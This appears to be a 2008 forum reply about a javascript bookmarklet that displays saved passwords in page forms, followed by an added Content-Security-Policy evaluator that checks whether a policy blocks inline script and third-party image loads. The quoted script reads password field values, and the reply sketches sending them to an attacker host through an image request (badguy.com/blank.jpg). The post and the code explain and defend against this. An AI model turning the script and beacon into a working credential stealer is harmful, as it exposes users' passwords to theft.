Posted by Todd H. on March 2, 2008, 12:30 pm
matthewslaney@gmail.com writes:
> Hi,
>
> I recently learned of the "exploit" where you can run a javascript
> command to view saved passwords that are hidden. This code:
>
> javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms;
> for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if
> (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if
> (s) alert("Passwords in forms on this page:\n\n" + s); else
> alert("There are no passwords in forms on this page.");})();
>
> I was wondering if there was any way to protect against this?
>
> Please refrain from stating the obvious, "don't save your passwords".
> There are a couple of sites I use frequently and don't care about
> security too much, but don't want my passwords to disappear.

This code is a good example of why cross-site scripting (XSS)
vulnerabilities are a big deal, and why you don't want untrusted
third-party javascript running in the security context of another
domain's page. That code can be trivially modified to load a blank
image from an attacker's site with arguments attached that send those
passwords to that site's log file (e.g. loading
badguy.com/blank.jpg?password1=blah&password2=foo).

To protect against this on the client end, turning off javascript
(made more manageable by the Firefox NoScript plugin, as suggested by
another user) is probably the most realistic countermeasure.

There are other risks associated with auto-populating passwords in
pages, and like any other security issue, you have to strike the
balance of convenience and security that's right for you.

Best Regards,
--
Todd H.
http://www.toddh.net/
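
The reply above covers the client-side countermeasure (disabling script). The complement on the server side, not mentioned in the thread, is a Content-Security-Policy (CSP) header that refuses inline script and restricts where images may be loaded from, which closes the image-beacon exfiltration path Todd describes. The following is an added example, not code from the thread or from either poster: a small evaluator that parses a CSP header value and reports whether the policy would still let an injected inline script run and whether img-src would let it fetch an image from an arbitrary third-party host. The function names and the three sample policies are constructed for illustration.

```javascript
// Added example (not code from the thread): a small Content-Security-Policy
// evaluator. Given the CSP header a site sends, it reports whether the policy
// would still let an injected inline script run and whether img-src would let
// that script request an image from an arbitrary third-party host, which is
// the exfiltration path described in the reply. Function and constant names
// are hypothetical.

// Parse "name src src; name src" into { name: [src, ...] }.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives[name.toLowerCase()] = sources;
  }
  return directives;
}

// Fetch directives fall back to default-src when absent; null means the
// browser applies no restriction at all for that directive.
function effectiveSources(directives, name) {
  if (directives[name]) return directives[name];
  if (directives['default-src']) return directives['default-src'];
  return null;
}

// True when a source list permits loads from any external host: no list,
// the '*' wildcard, or a bare scheme such as https: (any https host).
function allowsAnyHost(sources) {
  if (sources === null) return true;
  return sources.some(s => {
    const v = s.toLowerCase();
    return v === '*' || v === 'http:' || v === 'https:';
  });
}

// True when inline <script> blocks (and javascript: URLs) may execute.
function allowsInlineScript(directives) {
  const sources = effectiveSources(directives, 'script-src');
  if (sources === null) return true;
  return sources.some(s => s.toLowerCase() === "'unsafe-inline'");
}

// Summarise the properties relevant to the image-beacon exfiltration:
// an injected script must be able to run, and img-src (or connect-src,
// for XHR/fetch) must reach a host the site does not control.
function assessPolicy(header) {
  const d = parseCsp(header);
  return {
    inlineScript: allowsInlineScript(d),
    imgAnyHost: allowsAnyHost(effectiveSources(d, 'img-src')),
    connectAnyHost: allowsAnyHost(effectiveSources(d, 'connect-src')),
  };
}

// Constructed sample policies for illustration.
const WEAK_POLICY = "default-src *; script-src * 'unsafe-inline'";
const STRICT_POLICY =
  "default-src 'self'; script-src 'self'; img-src 'self' https://images.example.com";
const NO_POLICY = ''; // the site sends no CSP header at all

for (const [label, policy] of [['weak', WEAK_POLICY], ['strict', STRICT_POLICY], ['none', NO_POLICY]]) {
  console.log(label, assessPolicy(policy));
}
```

With the strict policy every flag comes back false: an injected inline script does not run, and even a script that did run could not load badguy.com/blank.jpg because img-src falls back to 'self' plus the one listed image host. The weak policy and the missing header both report true for every flag, which is the situation the thread describes.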